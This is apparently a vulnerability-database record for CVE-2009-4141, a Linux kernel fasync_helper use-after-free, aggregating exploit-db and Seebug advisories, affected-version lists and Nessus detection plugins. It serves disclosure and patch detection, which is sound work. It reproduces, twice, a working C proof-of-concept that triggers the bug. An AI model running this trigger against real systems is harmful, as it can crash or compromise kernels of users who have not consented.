ID CVE-2009-4141 Type cve Reporter NVD Modified 2017-09-18T21:29:55
Description
Use-after-free vulnerability in the fasync_helper function in fs/fcntl.c in the Linux kernel before 2.6.33-rc4-git1 allows local users to gain privileges via vectors that include enabling O_ASYNC (aka FASYNC or FIOASYNC) on a locked file, and then closing this file.
{"exploitdb": [{"lastseen": "2016-02-03T19:21:51", "osvdbidlist": ["61687"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Linux Kernel 2.6.x 'fasync_helper()' Local Privilege Escalation Vulnerability. CVE-2009-4141. Local exploit for linux platform", "reporter": "Tavis Ormandy", "published": "2009-12-16T00:00:00", "type": "exploitdb", "title": "Linux Kernel 2.6.x - 'fasync_helper' Local Privilege Escalation Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4141"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2009-12-16T00:00:00", "id": "EDB-ID:33523", "href": "https://www.exploit-db.com/exploits/33523/", "sourceData": "source: http://www.securityfocus.com/bid/37806/info\r\n\r\nLinux kernel is prone to a local privilege-escalation vulnerability.\r\n\r\nLocal attackers can exploit this issue to execute arbitrary code with kernel-level privileges.\r\n\r\nSuccessful exploits will result in the complete compromise of affected computers.\r\n\r\nThe Linux Kernel 2.6.28 and later are vulnerable. \r\n\r\n#ifndef _GNU_SOURCE\r\n# define _GNU_SOURCE\r\n#endif\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <stdint.h>\r\n#include <stdbool.h>\r\n#include <fcntl.h>\r\n#include <stdlib.h>\r\n#include <assert.h>\r\n#include <asm/ioctls.h>\r\n\r\n// Testcase for locked async fd bug -- taviso 16-Dec-2009\r\nint main(int argc, char **argv)\r\n{\r\n int fd;\r\n pid_t child;\r\n unsigned flag = ~0;\r\n\r\n fd = open(\"/dev/urandom\", O_RDONLY);\r\n\r\n // set up exclusive lock, but dont block\r\n flock(fd, LOCK_EX | LOCK_NB);\r\n\r\n // set ASYNC flag on descriptor\r\n ioctl(fd, FIOASYNC, &flag);\r\n\r\n // close the file descriptor to trigger the bug\r\n close(fd);\r\n\r\n // now exec some stuff to populate the AT_RANDOM entries, which will cause\r\n // the released file to be used.\r\n\r\n // This assumes /bin/true is an elf executable, and that this kernel\r\n // supports AT_RANDOM.\r\n do switch (child = fork()) {\r\n case 0: execl(\"/bin/true\", \"/bin/true\", NULL);\r\n abort();\r\n case -1: fprintf(stderr, \"fork() failed, %m\\n\");\r\n break;\r\n default: fprintf(stderr, \".\");\r\n break;\r\n } while (waitpid(child, NULL, 0) != -1);\r\n\r\n fprintf(stderr, \"waitpid() failed, %m\\n\");\r\n return 1;\r\n}\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/33523/"}], "seebug": [{"lastseen": "2017-11-19T18:16:09", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "Bugraq ID: 37806\r\nCVE ID\uff1aCVE-2009-4141\r\n\r\nLinux\u662f\u4e00\u6b3e\u5f00\u653e\u6e90\u4ee3\u7801\u7684\u64cd\u4f5c\u7cfb\u7edf\u3002\r\nLinux\u5185\u6838\u5904\u7406\u9501\u5b9afasync\u6587\u4ef6\u63cf\u8ff0\u7b26\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u4ee5\u5185\u6838\u7279\u6743\u6267\u884c\u4efb\u610f\u4ee3\u7801\u6216\u4f7f\u7cfb\u7edf\u5d29\u6e83\u3002\r\n\u6839\u636eLinus\u5206\u6790\uff0c\u201c\u95ee\u9898\u662f\u76f8\u540c\u6587\u4ef6\u63cf\u8ff0\u7b26\u53ef\u5728\u591a\u4e2afasync\u5217\u8868\u4e0a\uff0c\u5b83\u53ef\u4ee5\u5728\u7279\u5b9afasync\u5217\u8868\u4e0a\u5b58\u5728\u4e00\u6b21\uff0c\u4f46\u662f\u6587\u4ef6\u9501\u5b9a\u6bd4\u8f83\u7279\u6b8a\uff0c\u4f1a\u4f7f\u7528 'fl->fl_fasync'\u5217\u8868\u65e0\u89c6\u5728\u4ec0\u4e48\u5e95\u5c42\u8bbe\u5907\u9a71\u52a8\u6216\u5176\u4ed6\u7684\u60c5\u51b5\u4e0b\u589e\u52a0\u4efb\u610f\u6587\u4ef6\u5230\u5b83\u6240\u5c5e\u7684fasync\u5217\u8868\u4e2d\u3002"\r\n\u8fd9\u4e2a\u95ee\u9898\u662f\u56e0\u4e3a\u5b83\u4e0d\u6b63\u786e\u5047\u5b9a\u67d0\u4e2a\u6587\u4ef6\u53ea\u80fd\u5728\u4e00\u4e2afasync\u5217\u8868\u4e2d\uff0c\u6240\u4ee5fasync_helper()\u4f1a\u6e05\u9664FASYNC\u6807\u8bb0\u3002\r\nhttp://lxr.linux.no/#linux+v2.6.30.4/fs/fcntl.c#L566\r\n\u5f53\u6587\u4ef6\u63cf\u8ff0\u7b26\u6700\u540e\u5173\u95ed\u5e76\u4e14\u6587\u4ef6\u91ca\u653e\u65f6\uff0cFASYNC\u6807\u8bb0\u4e0d\u518d\u8bbe\u7f6e\uff0c\u56e0\u6b64\u5b83\u4e0d\u4f1a\u5728fasync\u5217\u8868\u4e2d\u88ab\u5220\u9664\uff0c\u5bfc\u81f4\u4f1a\u7ed9\u91ca\u653e\u7684\u7ed3\u6784\u9057\u7559\u865a\u6307\u9488(dangling reference)\u3002\n\nLinux kernel 2.6.32\r\nLinux kernel 2.6.31 5\r\n+ Trustix Secure Enterprise Linux 2.0\r\n+ Trustix Secure Linux 2.2\r\n+ Trustix Secure Linux 2.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.31 .2\r\nLinux kernel 2.6.31 .11\r\nLinux kernel 2.6.31 -rc7\r\n+ Trustix Secure Enterprise Linux 2.0\r\n+ Trustix Secure Linux 2.2\r\n+ Trustix Secure Linux 2.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.31 -rc6\r\n+ Trustix Secure Enterprise Linux 2.0\r\n+ Trustix Secure Linux 2.2\r\n+ Trustix Secure Linux 2.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.31 -rc3\r\n+ Trustix Secure Enterprise Linux 2.0\r\n+ Trustix Secure Linux 2.2\r\n+ Trustix Secure Linux 2.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.31 -rc1\r\n+ Trustix Secure Enterprise Linux 2.0\r\n+ Trustix Secure Linux 2.2\r\n+ Trustix Secure Linux 2.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.31\r\nLinux kernel 2.6.30 rc6\r\nLinux kernel 2.6.30 1\r\nLinux kernel 2.6.30 -rc5\r\nLinux kernel 2.6.30 -rc3\r\nLinux kernel 2.6.30 -rc2\r\nLinux kernel 2.6.30 -rc1\r\nLinux kernel 2.6.30\r\nLinux kernel 2.6.29 4\r\nLinux kernel 2.6.29 1\r\nLinux kernel 2.6.29 -git8\r\nLinux kernel 2.6.29 -git14\r\nLinux kernel 2.6.29 -git1\r\nLinux kernel 2.6.29\r\nLinux kernel 2.6.28 9\r\nLinux kernel 2.6.28 8\r\nLinux kernel 2.6.28 6\r\nLinux kernel 2.6.28 5\r\nLinux kernel 2.6.28 3\r\nLinux kernel 2.6.28 2\r\nLinux kernel 2.6.28 1\r\nLinux kernel 2.6.28 -rc7\r\nLinux kernel 2.6.28 -rc5\r\nLinux kernel 2.6.28 -rc1\r\nLinux kernel 2.6.28 -git7\r\nLinux kernel 2.6.28\r\nLinux kernel 2.6.33-rc4\r\n+ Trustix Secure Enterprise Linux 2.0\r\n+ Trustix Secure Linux 2.2\r\n+ Trustix Secure Linux 2.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.32-rc8\r\nLinux kernel 2.6.32-rc7\r\nLinux kernel 2.6.32-rc5\r\n+ Trustix Secure Enterprise Linux 2.0\r\n+ Trustix Secure Linux 2.2\r\n+ Trustix Secure Linux 2.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.32-rc4\r\nLinux kernel 2.6.32-rc3\r\n+ Trustix Secure Enterprise Linux 2.0\r\n+ Trustix Secure Linux 2.2\r\n+ Trustix Secure Linux 2.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.32-rc2\r\nLinux kernel 2.6.32-rc1\r\nLinux kernel 2.6.31.6\r\nLinux kernel 2.6.31.4\r\nLinux kernel 2.6.31.2\r\nLinux kernel 2.6.31.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.31-rc9\r\n+ Trustix Secure Enterprise Linux 2.0\r\n+ Trustix Secure Linux 2.2\r\n+ Trustix Secure Linux 2.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.31-rc8\r\n+ Trustix Secure Enterprise Linux 2.0\r\n+ Trustix Secure Linux 2.2\r\n+ Trustix Secure Linux 2.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.31-rc7\r\n+ Trustix Secure Enterprise Linux 2.0\r\n+ Trustix Secure Linux 2.2\r\n+ Trustix Secure Linux 2.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.31-rc5-git3\r\nLinux kernel 2.6.31-rc4\r\nLinux kernel 2.6.31-rc2\r\nLinux kernel 2.6.31-git11\r\n+ Trustix Secure Enterprise Linux 2.0\r\n+ Trustix Secure Linux 2.2\r\n+ Trustix Secure Linux 2.1\r\n+ Trustix Secure Linux 2.0\r\nLinux kernel 2.6.30.5\r\nLinux kernel 2.6.30.4\r\nLinux kernel 2.6.30.3\r\nLinux kernel 2.6.29-rc2-git1\r\nLinux kernel 2.6.29-rc2\r\nLinux kernel 2.6.29-rc1\r\nLinux kernel 2.6.28.4\r\nLinux kernel 2.6.28.10\n\u5382\u5546\u89e3\u51b3\u65b9\u6848\r\n\u7528\u6237\u53ef\u53c2\u8003\u5982\u4e0b\u5b89\u5168\u516c\u544a\u83b7\u5f97\u8865\u4e01\u4fe1\u606f\uff1a\r\nhttp://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=53281b6d34d44308372d16acb7fb5327609f68b6", "reporter": "Root", "published": "2010-01-16T00:00:00", "title": "Linux Kernel 'fasync_helper()'\u672c\u5730\u7279\u6743\u63d0\u5347\u6f0f\u6d1e", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4141"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2010-01-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-18949", "id": "SSV:18949", "sourceData": "\n #ifndef _GNU_SOURCE\r\n# define _GNU_SOURCE\r\n#endif\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <stdint.h>\r\n#include <stdbool.h>\r\n#include <fcntl.h>\r\n#include <stdlib.h>\r\n#include <assert.h>\r\n#include <asm/ioctls.h>\r\n\r\n// Testcase for locked async fd bug -- taviso 16-Dec-2009\r\nint main(int argc, char **argv)\r\n{\r\n int fd;\r\n pid_t child;\r\n unsigned flag = ~0;\r\n\r\n fd = open("/dev/urandom", O_RDONLY);\r\n\r\n // set up exclusive lock, but dont block\r\n flock(fd, LOCK_EX | LOCK_NB);\r\n\r\n // set ASYNC flag on descriptor\r\n ioctl(fd, FIOASYNC, &flag);\r\n\r\n // close the file descriptor to trigger the bug\r\n close(fd);\r\n\r\n // now exec some stuff to populate the AT_RANDOM entries, which will cause\r\n // the released file to be used.\r\n\r\n // This assumes /bin/true is an elf executable, and that this kernel\r\n // supports AT_RANDOM.\r\n do switch (child = fork()) {\r\n case 0: execl("/bin/true", "/bin/true", NULL);\r\n abort();\r\n case -1: fprintf(stderr, "fork() failed, %m\\n");\r\n break;\r\n default: fprintf(stderr, ".");\r\n break;\r\n } while (waitpid(child, NULL, 0) != -1);\r\n\r\n fprintf(stderr, "waitpid() failed, %m\\n");\r\n return 1;\r\n}\r\n\n ", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-18949", "status": "poc,details"}], "nessus": [{"lastseen": "2018-09-01T23:33:06", "references": ["http://rhn.redhat.com/errata/RHSA-2010-0149.html", "https://www.redhat.com/security/data/cve/CVE-2010-0008.html", "https://www.redhat.com/security/data/cve/CVE-2010-0437.html", "https://www.redhat.com/security/data/cve/CVE-2009-4141.html"], "pluginID": "63922", "description": "Updated kernel packages that fix three security issues and multiple bugs are now available for Red Hat Enterprise Linux 5.3 Extended Update Support.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nThis update fixes the following security issues :\n\n* a deficiency was found in the fasync_helper() implementation. This could allow a local, unprivileged user to leverage a use-after-free of locked, asynchronous file descriptors to cause a denial of service or privilege escalation. (CVE-2009-4141, Important)\n\n* a NULL pointer dereference flaw was found in the sctp_rcv_ootb() function in the Linux kernel Stream Control Transmission Protocol (SCTP) implementation. A remote attacker could send a specially crafted SCTP packet to a target system, resulting in a denial of service. (CVE-2010-0008, Important)\n\n* a NULL pointer dereference flaw was found in the ip6_dst_lookup_tail() function in the Linux kernel. An attacker on the local network could trigger this flaw by sending IPv6 traffic to a target system, leading to a system crash (kernel OOPS) if dst->neighbour is NULL on the target system when receiving an IPv6 packet. (CVE-2010-0437, Important)\n\nThis update also fixes the following bugs :\n\n* programs compiled on x86, and that also call sched_rr_get_interval(), were silently corrupted when run on 64-bit systems. With this update, when such programs attempt to call sched_rr_get_interval() on 64-bit systems, sys32_sched_rr_get_interval() is called instead, which resolves this issue. (BZ#557683)\n\n* the fix for CVE-2009-4538 provided by RHSA-2010:0053 introduced a regression, preventing Wake on LAN (WoL) working for network devices using the Intel PRO/1000 Linux driver, e1000e. Attempting to configure WoL for such devices resulted in the following error, even when configuring valid options :\n\n'Cannot set new wake-on-lan settings: Operation not supported not setting wol'\n\nThis update resolves this regression, and WoL now works as expected for network devices using the e1000e driver. (BZ#559334)\n\n* a number of bugs have been fixed in the copy_user routines for Intel 64 and AMD64 systems, one of which could have possibly led to data corruption. (BZ#568307)\n\n* on some systems, a race condition in the inode-based file event notifications implementation caused soft lockups and the following messages :\n\n'BUG: warning at fs/inotify.c:181/set_dentry_child_flags()' 'BUG: soft lockup - CPU#[x] stuck for 10s!'\n\nThis update resolves this race condition, and also removes the inotify debugging code from the kernel, due to race conditions in that code.\n(BZ#568663)\n\nUsers should upgrade to these updated packages, which contain backported patches to correct these issues. The system must be rebooted for this update to take effect.", "edition": 4, "reporter": "Tenable", "published": "2013-01-24T00:00:00", "title": "RHEL 5 : kernel (RHSA-2010:0149)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0008", "CVE-2009-4141", "CVE-2010-0437"], "modified": "2015-10-18T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:kernel-kdump", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "cpe:/o:redhat:enterprise_linux:5.3", "p-cpe:/a:redhat:enterprise_linux:kernel-PAE-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel", "p-cpe:/a:redhat:enterprise_linux:kernel", "p-cpe:/a:redhat:enterprise_linux:kernel-xen", "p-cpe:/a:redhat:enterprise_linux:kernel-PAE", "p-cpe:/a:redhat:enterprise_linux:kernel-xen-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-doc"], "id": "REDHAT-RHSA-2010-0149.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=63922", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0149. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63922);\n script_version(\"$Revision: 1.14 $\");\n script_cvs_date(\"$Date: 2015/10/18 04:40:37 $\");\n\n script_cve_id(\"CVE-2009-4141\", \"CVE-2010-0008\", \"CVE-2010-0437\");\n script_bugtraq_id(38185);\n script_xref(name:\"RHSA\", value:\"2010:0149\");\n\n script_name(english:\"RHEL 5 : kernel (RHSA-2010:0149)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix three security issues and multiple\nbugs are now available for Red Hat Enterprise Linux 5.3 Extended\nUpdate Support.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues :\n\n* a deficiency was found in the fasync_helper() implementation. This\ncould allow a local, unprivileged user to leverage a use-after-free of\nlocked, asynchronous file descriptors to cause a denial of service or\nprivilege escalation. (CVE-2009-4141, Important)\n\n* a NULL pointer dereference flaw was found in the sctp_rcv_ootb()\nfunction in the Linux kernel Stream Control Transmission Protocol\n(SCTP) implementation. A remote attacker could send a\nspecially crafted SCTP packet to a target system, resulting in a\ndenial of service. (CVE-2010-0008, Important)\n\n* a NULL pointer dereference flaw was found in the\nip6_dst_lookup_tail() function in the Linux kernel. An attacker on the\nlocal network could trigger this flaw by sending IPv6 traffic to a\ntarget system, leading to a system crash (kernel OOPS) if\ndst->neighbour is NULL on the target system when receiving an IPv6\npacket. (CVE-2010-0437, Important)\n\nThis update also fixes the following bugs :\n\n* programs compiled on x86, and that also call\nsched_rr_get_interval(), were silently corrupted when run on 64-bit\nsystems. With this update, when such programs attempt to call\nsched_rr_get_interval() on 64-bit systems,\nsys32_sched_rr_get_interval() is called instead, which resolves this\nissue. (BZ#557683)\n\n* the fix for CVE-2009-4538 provided by RHSA-2010:0053 introduced a\nregression, preventing Wake on LAN (WoL) working for network devices\nusing the Intel PRO/1000 Linux driver, e1000e. Attempting to configure\nWoL for such devices resulted in the following error, even when\nconfiguring valid options :\n\n'Cannot set new wake-on-lan settings: Operation not supported not\nsetting wol'\n\nThis update resolves this regression, and WoL now works as expected\nfor network devices using the e1000e driver. (BZ#559334)\n\n* a number of bugs have been fixed in the copy_user routines for Intel\n64 and AMD64 systems, one of which could have possibly led to data\ncorruption. (BZ#568307)\n\n* on some systems, a race condition in the inode-based file event\nnotifications implementation caused soft lockups and the following\nmessages :\n\n'BUG: warning at fs/inotify.c:181/set_dentry_child_flags()' 'BUG: soft\nlockup - CPU#[x] stuck for 10s!'\n\nThis update resolves this race condition, and also removes the inotify\ndebugging code from the kernel, due to race conditions in that code.\n(BZ#568663)\n\nUsers should upgrade to these updated packages, which contain\nbackported patches to correct these issues. The system must be\nrebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-4141.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-0008.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-0437.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2010-0149.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/03/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i686\", reference:\"kernel-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i686\", reference:\"kernel-PAE-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i686\", reference:\"kernel-PAE-devel-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i686\", reference:\"kernel-debug-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-debug-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-debug-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i686\", reference:\"kernel-debug-devel-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-debug-devel-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-debug-devel-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i686\", reference:\"kernel-devel-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-devel-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-devel-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", reference:\"kernel-doc-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i386\", reference:\"kernel-headers-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-headers-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-headers-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-kdump-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-kdump-devel-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i686\", reference:\"kernel-xen-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-xen-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i686\", reference:\"kernel-xen-devel-2.6.18-128.14.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-xen-devel-2.6.18-128.14.1.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:57:16", "references": ["http://www.nessus.org/u?b8d616ab", "https://bugzilla.redhat.com/show_bug.cgi?id=547906", "https://bugzilla.redhat.com/show_bug.cgi?id=559100", "https://bugzilla.redhat.com/show_bug.cgi?id=560547", "https://bugzilla.redhat.com/show_bug.cgi?id=552126", "https://bugzilla.redhat.com/show_bug.cgi?id=551214", "https://bugzilla.redhat.com/show_bug.cgi?id=550907"], "pluginID": "47258", "description": "Kernel security update for Fedora 11: CVE-2009-4141 CVE-2009-4536 CVE-2009-4537 CVE-2009-4538 CVE-2010-0307 Bugs: 559100 kernel:\ntty->pgrp races 521265 oops in VIA padlock driver\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 7, "reporter": "Tenable", "published": "2010-07-01T00:00:00", "title": "Fedora 11 : kernel-2.6.30.10-105.2.13.fc11 (2010-1500)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0307", "CVE-2009-4537", "CVE-2009-4141", "CVE-2009-4538", "CVE-2009-4536"], "modified": "2018-07-12T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:11"], "id": "FEDORA_2010-1500.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=47258", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2010-1500.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(47258);\n script_version(\"1.24\");\n script_cvs_date(\"Date: 2018/07/12 15:01:51\");\n\n script_cve_id(\"CVE-2009-4141\", \"CVE-2009-4536\", \"CVE-2009-4537\", \"CVE-2009-4538\", \"CVE-2010-0307\");\n script_bugtraq_id(36379, 36512, 36635, 36639, 36723, 36793, 36803, 36824, 36827, 36901, 37521);\n script_xref(name:\"FEDORA\", value:\"2010-1500\");\n\n script_name(english:\"Fedora 11 : kernel-2.6.30.10-105.2.13.fc11 (2010-1500)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Kernel security update for Fedora 11: CVE-2009-4141 CVE-2009-4536\nCVE-2009-4537 CVE-2009-4538 CVE-2010-0307 Bugs: 559100 